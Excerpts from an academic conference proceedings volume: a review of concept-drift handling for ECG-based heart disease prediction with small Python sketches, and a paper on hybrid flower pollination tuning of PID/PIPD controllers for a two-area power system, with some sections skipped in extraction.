microvisor virtualization approaches for embedded systems.
5. Tiburski, R. T., Moratelli, C. R., Filho, S. J., Neves, M. V., Matos, E. D., Amaral, L., &
Hessel, F. (2019). Lightweight security architecture based on embedded virtualization and
trust mechanisms for IoT edge devices. IEEE Communications Magazine, 57, 67–73.
6. Pinto, S., Gomes, T., Pereira, J., Cabral, J., & Tavares, A. (2017). IIoTEED: An enhanced,
trusted execution environment for industrial IoT edge devices. IEEE Internet Computing, 21,
40–47.
7. Dai, W., Jin, H., Zou, D., Xu, S., Zheng, W., Shi, L., & Yang, L. T. (2015). TEE: A virtual DRTM
based execution environment for secure cloud-end computing. Future Generation Computer
System, 49, 47–57.
8. Mishra, P., & Yadav, S. K. (2020) Threats and vulnerabilities to IoT end devices architecture and
suggested remedies. International Journal of Recent Technology and Engineering. 8(6):5712–
5718. https://doi.org/10.35940/ijrte.f9469.038620
9. Amoroso, E. G. (2011). Cyber attacks: Awareness. Network Security, 2011(1), 10–16. https://
doi.org/10.1016/s1353-4858(11)70005-8
10. Mounika, M., & Chinnaswamy, C. N. (2016). A comprehensive review on embedded
hypervisors. IJARCET., 5(5), 1546–1550.
11. Cerdeira, D., Santos, N., Fonseca, P., & Pinto, S. (2020). SoK: Understanding the prevailing
security vulnerabilities in trust zone-assisted TEE systems. IEEE Symposium on Security and
Privacy (SP), 2020, 1416–1432.
12. Shapsough, S., Aloul, F., & Zualkernan, I. (2018). Securing low-resource edge devices for IoT
systems. International Symposium in Sensing and Instrumentation in IoT Era (ISSI), 2018,
1–4.
13. Guan, L., Liu, P., Xing, X., Ge, X., Zhang, S., Yu, M., & Jaeger, T. (2017). TrustShadow:
Secure execution of unmodified applications with ARM TrustZone. In Proceedings of the 15th
Annual International Conference on Mobile Systems, Applications, and Services.
14. Usman, M., Ahmed, I., Aslam, M., Khan, S., & Shah, U. (2017). SIT: A lightweight encryption
algorithm for secure ınternet of things. ArXiv, abs/1704.08688.
15. Jones, M. (2013). Virtualization for embedded systems The how and why of small-device
hypervisors.
16. Poettering, B. (2007) Rijndael furious AES-128 ımplementation for AVR devices (2007). http://
point-at-infinity.org/avraes/.
17. Eisenbarth, T., Gong, Z., Güneysu, T., Heyse, S., Indesteege, S., Kerckhof, S., Koeune, F., Nad,
T., Plos, T., Regazzoni, F., Standaert, F., & Oldenzeel, L.V. (2012). Compact ımplementation
and performance evaluation of block ciphers in ATtiny devices. AFRICACRYPT.
18. Koo, W., Lee, H., Kim, Y.H., & Lee, D. (2008). Implementation and analysis of new lightweight
cryptographic algorithm suitable for wireless sensor networks. In 2008 International Confer-
ence on Information Security and Assurance (isa 2008) (pp. 73–76).
19. Guimarães, G., Souto, E., Sadok, D., & Kelner, J. (2005). Evaluation of security mechanisms
in wireless sensor networks. Systems Communications, 2005, 428–433.
Addressing Concept Drifts Using Deep
Learning for Heart Disease Prediction:
A Review
Abstract Heart disease is among the most significant causes of morbidity and mortality in the world's population. Prediction of cardiac disease is considered one of the most crucial topics in the field of medical data analysis. The quantity of data produced by the medical industry is very large. Deep learning can turn this huge volume of raw medical-care data into information that supports the identification of possibilities and forecasts. This paper presents a novel algorithm and performance methodology that can forecast heart disease by means of CNN modeling. The parameters evaluated are accuracy, sensitivity, specificity, and positive predictive value (PPV). Such parameters can be used in a user-friendly manner by doctors to trace out the possibility of disease.
1 Introduction
Machine learning [1, 2] uses historical data to determine patterns that indicate dangerous behavior in incoming data streams. For several machine learning applications, where such patterns either do not change or change only gradually over time, extracting patterns from the past to forecast future events is usually not a cause for concern [3, 4].
Real-world data are normally non-stationary. In many difficult data analysis applications, data evolve over time and must be examined in near real time [5]. This causes complications, since the forecasts may become less accurate as time passes, or opportunities to improve the accuracy may be
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 157
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_13
158 K. S. Desale and S. V. Shinde
missed. Concept drift refers to the scenario in which the relationship between the input data and the target variable that a model is trying to learn changes over time. Drifts are categorized into temporary and permanent changes [6]. A temporary drift is a shift that appears for a limited period and then resolves itself, whereas a permanent drift gradually shifts the entire process, interfering with the event records while the features are in operation [7]. In pattern recognition, this event is known as covariate shift or dataset shift. In signal processing, the phenomenon is referred to as non-stationarity. Changes in the underlying data occur on account of changing individual motivations, variations in population, adversarial actions, or they can be linked to a complex component of the situation [8, 9].
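For illustration, the drift behavior described above can be made concrete with a simple two-window monitor: a reference window summarizes the past concept, and a drift is flagged when the mean of the most recent window departs from it. This is only a minimal sketch; the window size and the threshold factor k are illustrative choices, not parameters taken from any of the cited methods.

```python
from collections import deque
from statistics import mean, stdev

def detect_drift(stream, win=50, k=3.0):
    """Flag indices where the recent window's mean departs from the
    reference window by more than k reference standard deviations."""
    ref, cur, drifts = [], deque(maxlen=win), []
    for i, x in enumerate(stream):
        if len(ref) < win:
            ref.append(x)              # build the reference window first
            continue
        cur.append(x)
        if len(cur) == win:
            s = stdev(ref) or 1e-9     # guard against zero variance
            if abs(mean(cur) - mean(ref)) > k * s:
                drifts.append(i)       # mean shift exceeds k reference std-devs
                ref, cur = list(cur), deque(maxlen=win)  # adopt the new concept
    return drifts
```

On a stream that jumps from 0 to 5 after 100 samples, the first drift is flagged as soon as the recent window starts absorbing the new level.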
The challenge of concept drift is of growing significance, as an increasing amount of data is organized in the form of data streams rather than stationary sources, and it is unrealistic to assume that the data distribution stays steady over a prolonged time frame. It is not surprising that the issue of concept drift is studied in different research areas including, but certainly not limited to, pattern mining, machine learning and data mining, data streams, information retrieval, and recommender systems [10].
Several techniques for identifying and managing concept drift have been recommended in the research literature, and several of them have already validated their capabilities in a wide range of application domains. A further circumstance is learning in the presence of hidden variables. User modeling is among the most popular learning applications, where the learning strategy constructs a model of the user's goals, which are obviously not visible and can change occasionally [12]. Drift likewise arises in monitoring tasks and predictive maintenance. Learning the patterns is one example of a model where degradation or decay of technical components occurs over time. Concept drift is used as a universal term to describe computational challenges involving changes over time. Such changes may be of many distinct kinds, and there are several categories of applications which necessitate different adaptation approaches [13]. Different kinds of tasks may be required depending on the intended application, such as regression, ranking, classification, novelty detection, clustering, and item-set mining. Prediction makes assertions about the future, or about undiscovered properties of the present. Prediction is probably the most prevalent use of data mining, and it covers regression and classification steps. Regression [14, 15] is ordinarily encountered in demand forecasting, resource scheduling optimization, user modeling and, generally, in applications where the key target is to foresee future patterns of prospects. Ranking is a special kind of prediction, where a partial ordering of alternatives is expected. Classification is a standard task in diagnosis as well as decision support, for example, antibiotic resistance prediction, fake data classification, or fake news detection [16]. Ranking is a general task in recommendation, information retrieval, document rating, and preference learning application areas. Regression, ranking, and classification are supervised learning tasks, where models are trained on cases for which the ground truth is available [17].
Furthermore, in medical domain applications, concept drift (CD) needs to be considered in predictive models for disease prediction, drug prediction, survival prediction, etc. Hence, this paper presents a research methodology intended for the prediction of human heart conditions in terms of several electrocardiogram (ECG) elements.
2 Literature Review
Despite the many different QRS detection algorithms reported in the literature, the development of a reliable QRS detector remains an open issue in the medical field.
Zero-crossing techniques are robust against noise and are especially practical for fixed-point arithmetic. This detection approach is computationally efficient and delivers a high level of detection performance even in very noisy ECG signals. In this procedure, the onset of an event is detected when the feature signal falls below a signal-adaptive threshold, while its end is determined when the signal rises above the threshold again. The beginning and end of the event define the bounds of the search interval for the eventual localization of the R-wave. If nearby events are temporally very close, they are merged into one single event. The starting point of the combined event is the start of the first event, and the end of the merged event is the end of the last event. The threshold applied per stage for counting the number of zero-crossings is predetermined and estimated empirically [23]. Another author formulated a new approach for QRS complex detection of ECG signals, employing a particle swarm optimization (PSO)-based adaptive filter (AF). In the recommended technique, the AF, based on PSO, is used to generate the feature signal. An efficient detection algorithm with look-backs is formulated to recover missed peaks [24].
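The onset/offset logic described above (an event starts when the feature signal falls below a threshold, ends when it rises above it again, and temporally close events are merged) can be sketched as follows. A fixed threshold and merge gap are used here for simplicity, whereas the cited method [23] uses a signal-adaptive threshold.

```python
def detect_events(feature, threshold, merge_gap):
    """Segment a feature signal into (start, end) events: an event starts
    when the signal drops below the threshold and ends when it rises
    above it again; events closer than merge_gap samples are merged."""
    events, start = [], None
    for i, v in enumerate(feature):
        if start is None and v < threshold:
            start = i                      # onset: signal falls below threshold
        elif start is not None and v >= threshold:
            events.append((start, i))      # offset: signal rises back above
            start = None
    if start is not None:
        events.append((start, len(feature)))
    merged = []
    for s, e in events:
        if merged and s - merged[-1][1] < merge_gap:
            merged[-1] = (merged[-1][0], e)    # fuse temporally close events
        else:
            merged.append((s, e))
    return merged
```

Each merged interval would then serve as the search window for localizing the R-wave.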
In another study, the author carried out ECG signal preprocessing and SVM-based arrhythmic beat classification to separate normal and abnormal subjects. In the ECG signal preprocessing, a delayed-error normalized LMS adaptive filter is used to obtain a high-speed, low-latency pipeline with reduced computational cost. Since the signal processing approach is designed for remote medical devices, white noise removal is the primary target. The discrete wavelet transform is applied to the preprocessed signal for HRV feature extraction, and machine learning approaches are employed to perform the arrhythmic beat classification [25]. Table 1 summarizes some of the ECG signal evaluation methods.
An author designed a new entry for the PhysioNet/CinC challenge, which aims to encourage the development of algorithms to classify whether a short single-lead ECG recording shows normal sinus rhythm, atrial fibrillation (AF), an alternative rhythm, or is too noisy to be classified. The procedure proposed by the author combines timing information obtained via QRS detection with features from a robust estimator and waveform features, using a random forest classifier. Hence, the objective of this research is to identify the research gap, as shown in Table 2, and to develop a methodology for the prediction and classification of ECG elements.
3 Research Methodology
Heart disease remains among the significant causes of fatality around the world. Heart disease diagnosis is currently costly; consequently, it is vital to predict the risk of developing heart disease from specific attributes. The feature
If enhanced data are available, the prediction model will be applied for recognition of the forecasted heart conditions. If no disorder prediction value is obtained, recurrent concept drift handling is carried out until the model yields prediction outcomes. For the prediction values, hyperparameters will be set for complete training on the dataset. Furthermore, after training, a validation evaluation is executed to compare the proposed system's results with existing reported outcomes.
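The retraining loop sketched below illustrates this recurrent drift-handling idea generically. `MeanPredictor` is a deliberately trivial stand-in for the CNN model of the proposed methodology, and the error tolerance `tol` is an arbitrary illustrative threshold.

```python
from statistics import mean

class MeanPredictor:
    """Placeholder model: predicts the training mean (stands in for the CNN)."""
    def fit(self, xs, ys):
        self.c = mean(ys)
        return self
    def predict(self, xs):
        return [self.c] * len(xs)

def error(model, xs, ys):
    """Mean absolute error of the model on a labeled batch."""
    return mean(abs(p - y) for p, y in zip(model.predict(xs), ys))

def monitor_and_retrain(batches, tol=0.5):
    """Retrain whenever validation error on a new batch exceeds `tol`
    (a stand-in for the recurrent drift handling described above);
    returns the batch indices at which retraining occurred."""
    (x0, y0), rest = batches[0], batches[1:]
    model = MeanPredictor().fit(x0, y0)
    retrains = []
    for i, (xs, ys) in enumerate(rest, start=1):
        if error(model, xs, ys) > tol:          # drift: predictions degraded
            model = MeanPredictor().fit(xs, ys)
            retrains.append(i)
    return retrains
```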
References
1. Zenisek, J., Holzinger, F., & Affenzeller, M. (2019). Machine learning based concept drift
detection for predictive maintenance. Computers & Industrial Engineering, 137.
2. de Mello, R. F., et al. (2019). On learning guarantees to unsupervised concept drift detection
on data streams. Expert Systems with Applications, 117, 90–102.
3. Cejnek, M., & Bukovsky, I. (2018). Concept drift robust adaptive novelty detection for data streams. Neurocomputing, 309. https://doi.org/10.1016/j.neucom.2018.04.069.
4. De Marsico, M., Petrosino, A., & Ricciardi, S. (2016). Iris recognition through machine learning techniques: A survey. Pattern Recognition Letters, 82(Part 2), 106–115. ISSN 0167-8655. https://doi.org/10.1016/j.patrec.2016.02.001.
5. Demšar, J., & Bosnić, Z. (2018). Detecting concept drift in data streams using model explana-
tion. Expert Systems with Applications, 92, 546–559.
6. Lu, Y., Cheung, Y.-M., & Tang, Y. Y. (2019). Adaptive chunk-based dynamic weighted majority
for imbalanced data streams with concept drift. IEEE Transactions on Neural Networks and
Learning Systems.
7. Lin, L., et al. (2019). Concept drift based multi-dimensional data streams sampling method. In
Pacific-Asia Conference on Knowledge Discovery and Data Mining. (Vol. 11439, pp. 331–342).
LNAI.
8. Roveri, M. (2019). Learning discrete-time Markov chains under concept drift. IEEE Transac-
tions on Neural Networks and Learning Systems, 30(9), 2570–2582. https://doi.org/10.1109/
TNNLS.2018.2886956.
9. Ryan, S., Corizzo, R., Kiringa, I., & Japkowicz, N. (2019). Deep learning versus conventional
learning in data streams with concept drifts. In 18th IEEE International Conference On Machine
Learning And Applications (ICMLA) (pp. 1306–1313). Boca Raton, FL, USA. https://doi.org/
10.1109/ICMLA.2019.00213.
10. Liu, A., Lu, J., & Zhang, G. (2020). Diverse instance-weighting ensemble based on region drift disagreement for concept drift adaptation. IEEE Transactions on Neural Networks and Learning Systems. https://doi.org/10.1109/TNNLS.2020.2978523.
11. Yang, Z., Al-Dahidi, S., Baraldi, P., Zio, E., & Montelatici, L. (2020). A novel concept drift
detection method for incremental learning in nonstationary environments. IEEE Transactions
on Neural Networks and Learning Systems, 31(1), 309–320. https://doi.org/10.1109/TNNLS.
2019.2900956.
12. Iwashita, A. S., de Albuquerque, V. H. C., & Papa, J. P. (2019). Learning concept drift with
ensembles of optimum-path forest-based classifiers. Future Generation Computer Systems, 95,
198–211.
13. Zhou, X., Lo Faro, W., Zhang, X., & Arvapally, R. S. (2019). A framework to monitor machine learning systems using concept drift detection. In W. Abramowicz & R. Corchuelo (Eds.), Business Information Systems (BIS 2019), Lecture Notes in Business Information Processing (Vol. 353). Cham: Springer.
14. Song, Y., Lu, J., Lu, H., & Zhang, G. (2020). Fuzzy clustering-based adaptive regression for
drifting data streams. IEEE Transactions on Fuzzy Systems, 28(3), 544–557. https://doi.org/
10.1109/TFUZZ.2019.2910714.
15. Rutkowska, D., & Rutkowski, L. (2019). On the Hermite series-based generalized regression neural networks for stream data mining. In T. Gedeon, K. Wong, & M. Lee (Eds.), Neural Information Processing (ICONIP 2019), Lecture Notes in Computer Science (Vol. 11955). Cham: Springer.
16. Abdualrhman, M. A. A., & Padma, M. C. (2020). Deterministic Concept drift detection in
ensemble classifier based data stream classification process. IJGHPC, 11(1), 29–48. https://
doi.org/10.4018/IJGHPC.2019010103.
17. Abdualrhman, M. A. A., & Padma, M. C. (2019). CD2A: Concept drift detection approach
toward imbalanced data stream. In V. Sridhar, M. Padma, & K. Rao (Eds.), Emerging Research
in Electronics, Computer Science and Technology Lecture Notes in Electrical Engineering
(Vol. 545). Singapore: Springer.
18. McConville, R., et al. (2018). Online heart rate prediction using acceleration from a wrist worn
wearable. arXiv:1807.04667.
19. Zhang, L., Zhao, J., & Li, W. Online and unsupervised anomaly detection for streaming data using an array of sliding windows and PDDs. IEEE Transactions on Cybernetics. https://doi.org/10.1109/TCYB.2019.2935066.
20. Yu, S., et al. (2019). Concept drift detection and adaptation with hierarchical hypothesis testing.
arXiv:1707.07821.
21. Albuquerque, R. A. S., Costa, A. F. J., Miranda dos Santos, E., Sabourin, R., & Giusti, R.
(2019). A decision-based dynamic ensemble selection method for concept drift 2019. In: IEEE
31st International Conference on Tools with Artificial Intelligence (ICTAI) (pp. 1132–1139)
Portland, OR, USA. https://doi.org/10.1109/ICTAI.2019.00158.
22. Li, Z., Huang, W., Xiong, Y., Ren, S., & Zhu, T. (2020). Incremental learning imbalanced
data streams with concept drift: The dynamic updated ensemble algorithm. Knowledge-Based
Systems, 195.
23. Raj, S., Ray, K. C., & Shankar, O. (2018). Development of robust, fast and efficient QRS
complex detector: A methodological review. Australasian Physical & Engineering Sciences in
Medicine, 41, 581–600. https://doi.org/10.1007/s13246-018-0670-7.
24. Jain, S., Kumar, A., & Bajaj, V. (2016). Technique for QRS complex detection using particle
swarm optimization. IET Science, Measurement & Technology, 10(6), 626–636.
25. Venkatesan, C., Karthigaikumar, P., Paul, A., Satheeskumaran, S., & Kumar, R. (2018). ECG
signal preprocessing and SVM classifier-based abnormality detection in remote healthcare
applications. IEEE Access, 6, 9767–9773. https://doi.org/10.1109/ACCESS.2018.2794346.
26. Saurav, S., Malhotra, P., Vishnu, T. V., Gugulothu, N., Vig, L., Agarwal, P., & Shroff, G. (2018).
Online anomaly detection with concept drift adaptation using recurrent neural networks. In Pro-
ceedings of the ACM India Joint International Conference on Data Science and Management
of Data (CoDS-COMAD ’18). (pp. 78–87). New York, NY, USA.: Association for Computing
Machinery. https://doi.org/10.1145/3152494.3152501.
27. Steinberg, C., Philippon, F., Sanchez, M., et al. (2019). A novel wearable device for continuous
ambulatory ECG recording: proof of concept and assessment of signal quality. Biosensors
(Basel), 9(1):17. Published 2019 Jan 21. https://doi.org/10.3390/bios9010017.
28. Zuo, J., Zeitouni, K., & Taher, Y. (2019). ISETS: Incremental Shapelet Extraction from Time
Series Stream.
29. Sahmoud, S., & Topcuoglu, H. R. (2020). A general framework based on dynamic multi-
objective evolutionary algorithms for handling feature drifts on data streams. Future Generation
Computer Systems, 102, 42–52.
30. Duda, P., Jaworski, M., Cader, A., & Wang, L. (2020). On training deep neural networks using
a streaming approach. Journal of Artificial Intelligence and Soft Computing Research, 10(1),
15–26. https://doi.org/10.2478/jaiscr-2020-0002.
31. Fedotov, A. (2019). The concept of a new generation of electrocardiogram simulators. Measurement Techniques, 61. https://doi.org/10.1007/s11018-019-01576-3.
32. Anugirba, K. (2019). ECG QRS complex detector for BSN using multiscale mathematical
morphology. Journal of the Gujarat Research Society, 21(14), 655–662.
33. Liu, C., et al. (2019). Signal quality assessment and lightweight QRS detection for wearable
ECG smartVest system. IEEE Internet of Things Journal, 6(2), 1363–1374. https://doi.org/10.
1109/JIOT.2018.2844090.
34. Erdenebayar, U., Kim, Y. J., Park, J.-U., Joo, E. Y., & Lee, K.-J. (2019). Deep learning
approaches for automatic detection of sleep apnea events from an electrocardiogram. Com-
puter Methods and Programs in Biomedicine, 180.
Tailoring the Controller Parameters
Using Hybrid Flower Pollination
Algorithm for Performance
Enhancement of Multisource Two Area
Power System
Abstract The stability of the multisource interactive power generation system can
be achieved by accurately tuning the controller parameters, which regulates the
power flow in the system. This article is dedicated to a novel hybrid flower pollina-
tion algorithm applicable to regulate the proportional-integral-derivative (PID) and
proportional-integral cascaded with proportional-derivative (PIPD) controller struc-
tures integrated in the interlinked multisource two area AC-DC power systems. The
supremacy of the proposed algorithm is investigated with respect to a range of techniques discussed in the literature. The comparison parameters taken into consideration are the variations in tie-line power and area frequency, along with the reduction in controller errors, to achieve better system stability.
1 Introduction
Electrical power generated from diverse sources like hydro, thermal, gas, solar and
wind power plants serve the consumers. However, it is a matter of fact that the
interconnection of these (AC-DC) power plants reduces the quality of power, stability
and consistency of the power system. With a view to overcome power crisis, the
power flow controller of the interlinked systems must be optimally controlled to
limit the losses in the system. Also, it is essential to ensure that the interlinked
system is working on the nominal values of system parameters such as voltage,
phase and frequency for its successful operation. It is also important to quantify the
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 169
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_14
170 M. Khatri et al.
power distribution to satisfy the load demand under balanced conditions. However, frequent changes in the power required by the load affect the area frequency and the power in the common tie-line connecting the areas of multiple energy sources.
Hence, the intention here is to keep the frequency and power of the interdependent system within limits and to make efforts to diminish the area control error to achieve stability. For the load frequency adjustment of single/two/multiple area networks, various studies have been developed and implemented over the last few decades.
Recently, these studies have been extended to the implementation of bio-inspired algorithms for the optimization of controller parameters. Some of the popular algorithms presented by researchers to improve the controller response are the cuckoo search algorithm (CSA) employed for two-area interdependent energy resources [1], the firefly algorithm (FA) utilized for multi-area systems [2], the genetic algorithm (GA) for the automatic generation control system [3], particle swarm optimization (PSO) [4], the teaching–learning-based optimization algorithm [5, 6], the bacterial foraging algorithm (BF) [7], the artificial immune system (AIS) [8], the flower pollination algorithm (FPA) [9, 10], etc. It has been observed that, due to nonlinearities/nonlinear loads, the system response deteriorates in terms of parameters such as high peak overshoot, large settling time and prolonged oscillations.
Thus, this paper contributes to tuning the PID and PIPD controller variables for the multisource connected areas. The controller gains are refined with the proffered algorithm under varying load conditions, and its performance is compared to recently published algorithms [11, 12].
The work is structured as follows: Sect. 2 illustrates the mathematical blueprint of the multisource two-area interdependent system along with its parameters. Section 3 presents the enhanced version of the PID/PIPD controllers, whose gains are optimized using the hybrid flower pollination algorithm. Afterward, a comparison of the proposed algorithm is carried out and its performance is observed. In Sect. 4, the conclusion about the proffered algorithm is drawn.
plant speed governor is T GH1, T GH2; the turbine speed governor reset time is T RS1, T RS2; the transient droop time constant of the hydro turbine is T RH1, T RH2; the lead time constant of the gas turbine speed governor is X C; the lag time constant of the gas turbine speed governor is Y C; the gas turbine valve position is c g; the gas turbine valve position constant is b g; the gas turbine combustion reaction time delay is T CR; the discharge volume-time constant of the gas turbine compressor is T CD; the power system gain is K PS; the power system time constant is T PS; and the incremental load change is ΔP D1, ΔP D2. The DC power source has the gain K DS and the power system time constant T DS.
An area control error of the presented system is given below
Each component of the area has been analyzed in the frequency domain and presented in transfer function form. The thermal speed governing system has two inputs, the reference U T1,2 and Δf 1,2, and the output obtained is given by Eq. (2):
ΔP T1,2 = U T1,2 − (1/R T1,2) · Δf 1,2    (2)
Similarly, for the hydro and gas power units, the outputs obtained are given by Eqs. (3) and (4), respectively:
ΔP H1,2 = U H1,2 − (1/R H1,2) · Δf 1,2    (3)
ΔP G1,2 = U G1,2 − (1/R G1,2) · Δf 1,2    (4)
CE 1,2 = ITAE = ∫₀^t_sim (|Δf 1| + |Δf 2| + |ΔP tie|) · t · dt    (6)
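Given sampled deviations, Eq. (6) can be evaluated numerically; the trapezoidal rule used below is one common choice, not prescribed by the text, and the sample arrays are illustrative.

```python
def itae(t, df1, df2, dptie):
    """Approximate ITAE = ∫ (|Δf1| + |Δf2| + |ΔPtie|) · t dt with the
    trapezoidal rule over sampled deviations at times t."""
    g = [(abs(a) + abs(b) + abs(c)) * ti
         for ti, a, b, c in zip(t, df1, df2, dptie)]
    return sum((g[i] + g[i + 1]) * (t[i + 1] - t[i]) / 2.0
               for i in range(len(t) - 1))
```

For a constant deviation |Δf1| = 1 over t ∈ [0, 2], this reduces to ∫ t dt = 2, which the sketch reproduces.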
U H = K P1 CE 1 + K I1 ∫ CE 1 dt + K P2 CE 1 + K d1 (dCE 1/dt)    (7)
U T = K P1 CE 1 + K I1 ∫ CE 1 dt + K P2 CE 1 + K d1 (dCE 1/dt)    (8)
U G = K P1 CE 1 + K I1 ∫ CE 1 dt + K P2 CE 1 + K d1 (dCE 1/dt)    (9)
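A discrete-time evaluation of the control law in Eqs. (7)–(9) can be sketched as below; the rectangular-rule integral, backward-difference derivative, sampling step and unit gains are illustrative choices.

```python
def pipd_control(ce, dt, kp1, ki1, kp2, kd1):
    """Discrete-time evaluation of Eqs. (7)-(9): proportional, integral
    (rectangular rule), second proportional and derivative (backward
    difference) terms acting on the control error samples `ce`."""
    u, integral, prev = [], 0.0, ce[0]
    for e in ce:
        integral += e * dt                  # ∫ CE dt
        deriv = (e - prev) / dt             # dCE/dt
        u.append(kp1 * e + ki1 * integral + kp2 * e + kd1 * deriv)
        prev = e
    return u
```

With a constant error and all gains equal to one, only the integral term grows between samples.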
For multi-objective optimization problems, the flower pollination algorithm rules were formulated in [14]. Plants propagate their species through pollination, by means of transporting pollen from one flower to another for reproduction. If the pollinators are birds, animals or insects, the pollination is biotic; otherwise, the pollinators can be abiotic, such as wind and water [15].
Biotic pollinators can move over long distances; this comes under the category of global pollination, which exhibits Lévy flight behavior [16] and is mathematically formulated using the Lévy distribution to obtain the random solutions of the conventional flower pollination algorithm [17]. On the other hand, pollination through abiotic pollinators, called local pollination, can be mathematically formulated for effective convergence of solutions using the pattern search algorithm (PS) [18]. To decide whether the pollination is global or local, the switch probability p takes values in the range 0–1. The mathematical expression of the global pollination using Lévy flight behavior is
X i^(t+1) = X i^t + γ L(ρ) (G* − X i^t)    (10)
L ∼ [ρ Γ(ρ) sin(πρ/2) / π] · 1/s^(1+ρ)    (11)
where Γ(ρ) denotes the standard gamma function, and the distribution is valid for large steps s > 0. When a uniform random number is lower than the switch probability p, local pollination occurs, expressed mathematically as
X i^(t+1) = X i^t + ε (X j^t − X k^t)    (12)
where X j^t and X k^t are pollen from different flowers of the same species, which ensures consistency of the outcome in the event of local pollination. The step size can be drawn using Eq. (13), where A and B are random numbers following a Gaussian distribution, and the samples can be gathered from a standard Gaussian distribution function with
σ² = [Γ(1 + ρ) sin(πρ/2) / (ρ Γ((1 + ρ)/2) · 2^((ρ−1)/2))]^(1/ρ)    (14)
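Putting Eqs. (10), (12) and (14) together, a minimal flower pollination optimizer can be sketched as follows. The Lévy steps are drawn with Mantegna's method using the σ of Eq. (14); the population size, iteration count, scaling factor γ, bounds and the sphere test function are all illustrative choices, not values from the cited works.

```python
import math, random

def levy_step(rho=1.5):
    """Mantegna's method: step = A / |B|^(1/rho), with A ~ N(0, sigma^2),
    B ~ N(0, 1) and sigma taken from Eq. (14)."""
    sigma = (math.gamma(1 + rho) * math.sin(math.pi * rho / 2)
             / (rho * math.gamma((1 + rho) / 2) * 2 ** ((rho - 1) / 2))) ** (1 / rho)
    a, b = random.gauss(0, sigma), random.gauss(0, 1)
    return a / abs(b) ** (1 / rho)

def fpa(f, dim, n=20, iters=200, p=0.8, gamma=0.1, lo=-5.0, hi=5.0):
    """Minimize f: global pollination (Lévy flight toward the best flower,
    Eq. 10) with probability p, else local pollination (Eq. 12)."""
    pop = [[random.uniform(lo, hi) for _ in range(dim)] for _ in range(n)]
    best = min(pop, key=f)
    for _ in range(iters):
        for i in range(n):
            if random.random() < p:        # global: Lévy flight toward best
                cand = [x + gamma * levy_step() * (g - x)
                        for x, g in zip(pop[i], best)]
            else:                          # local: move between two flowers
                j, k = random.sample(range(n), 2)
                eps = random.random()
                cand = [x + eps * (a - b)
                        for x, a, b in zip(pop[i], pop[j], pop[k])]
            cand = [min(hi, max(lo, x)) for x in cand]   # keep within bounds
            if f(cand) < f(pop[i]):                      # greedy acceptance
                pop[i] = cand
        best = min(pop, key=f)
    return best
```

On a 2-D sphere function the swarm contracts quickly around the origin, since only improving moves are accepted.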
Flowers that are closer together have a greater chance of being fertilized by local pollination, while distant flowers are more likely to be pollinated globally. Therefore, the switch probability is used for switching between local and global pollination, and it is to some extent biased toward local pollination [19]. The pattern search algorithm is a derivative-free method for solving parameter optimization problems. It is based on the computation of a sequence of points that progressively approach the optimal solution by creating a mesh.
The mesh is a collection of points around the starting point defined by the FPA. The chosen point, i.e., the current best, is multiplied by a scalar set of direction vectors, known as the pattern, to create the mesh, and the mesh point with the best objective function value becomes the current point for the subsequent iteration. For the first iteration, the mesh size is initiated with scalar 1, and then the direction vectors are initiated [20, 21]. The FPA decides the initial point X 0, and the direction vectors are appended to compute the objective function, whose value is compared against that of the initial point X 0. If the objective function successfully reaches a smaller value, then that mesh point becomes X 1 [22, 23]. Thereafter, based upon the success in reducing the objective function, in the second iteration the mesh size is multiplied by higher or lower multiplier factors to obtain the optimal solution. Thus, the feedback gain is optimized in the presented work.
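The mesh-based procedure described above corresponds to a basic compass/pattern search: poll the objective at mesh points around the current best along coordinate directions, expand the mesh on success and contract it on failure. The expansion and contraction factors below are common defaults rather than values from the cited works [20–23].

```python
def pattern_search(f, x0, mesh=1.0, expand=2.0, contract=0.5,
                   tol=1e-6, max_iter=1000):
    """Derivative-free pattern (compass) search: evaluate f at mesh
    points x ± mesh·e_d; move to an improving point and expand the
    mesh, otherwise contract it until the mesh is smaller than tol."""
    x, fx = list(x0), f(x0)
    for _ in range(max_iter):
        if mesh < tol:
            break
        improved = False
        for d in range(len(x)):             # poll each coordinate direction
            for s in (+1, -1):
                cand = list(x)
                cand[d] += s * mesh
                fc = f(cand)
                if fc < fx:                 # accept the first improving point
                    x, fx, improved = cand, fc, True
                    break
            if improved:
                break
        mesh = mesh * expand if improved else mesh * contract
    return x, fx
```

In a hybrid scheme such as hFPA:PS, this refinement would be started from the best flower returned by the FPA stage.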
The controller gains K p, K I and K d of the PID and K p1, K I1, K d1 and K p2 of the PIPD for the multisource (6 sources) two-area network are given in Table 1. Here, the system is interlinked through the AC tie-line only. The system parameters considered for the optimized operation of the controllers using the hybrid flower pollination algorithm are a Lévy distribution factor of 1.5, 50 iterations and a switching probability of 0.8.
The simulations are carried out with the controller parameters mentioned in Table 1. The algorithms implemented for controller tuning are the differential evolution algorithm (DE)-based PID, the hybrid stochastic fractal search combined with pattern search technique (hSFS:PS)-based PID, and the hybrid flower pollination algorithm combined with pattern search (hFPA:PS)-based PID and PIPD [20–22].
The performance comparison of the mentioned algorithms is done on the basis of the following indices: the objective function ITAE and the states of the system frequencies (Δf 1,2), i.e., peak overshoot (PO), peak undershoot (PU) and settling time (ST) for areas 1 and 2, respectively, together with the connected tie-line power, as represented in Table 3.
The obtained results of the proposed hFPA:PS-PIPD algorithm are validated by observing the frequency variations, which decrease significantly compared to the other algorithms. It is also evident that the ITAE is minimized, and thus system stability and reliability are achieved.
Moreover, the response of the system can be observed graphically, as shown in Fig. 2, for the change in area 1 frequency (Δf 1). With the proposed algorithm for the PID and PIPD controllers, the system frequency reaches the steady state at a faster rate compared to the discussed methods. Figure 3 represents the variations in area 2 frequency (Δf 2), and the response of the variation in tie-line power (ΔP tie) is shown in Fig. 4. By using the proffered method, losses can be reduced drastically and the system can be balanced in minimum time.
Fig. 2 Comparison of frequency variations in area-1 incorporated with PID and PIPD controller
Fig. 3 Comparison of frequency variations in area-2 incorporated with PID and PIPD controller
Fig. 4 Comparison of tie-line power variations incorporated with PID and PIPD controller
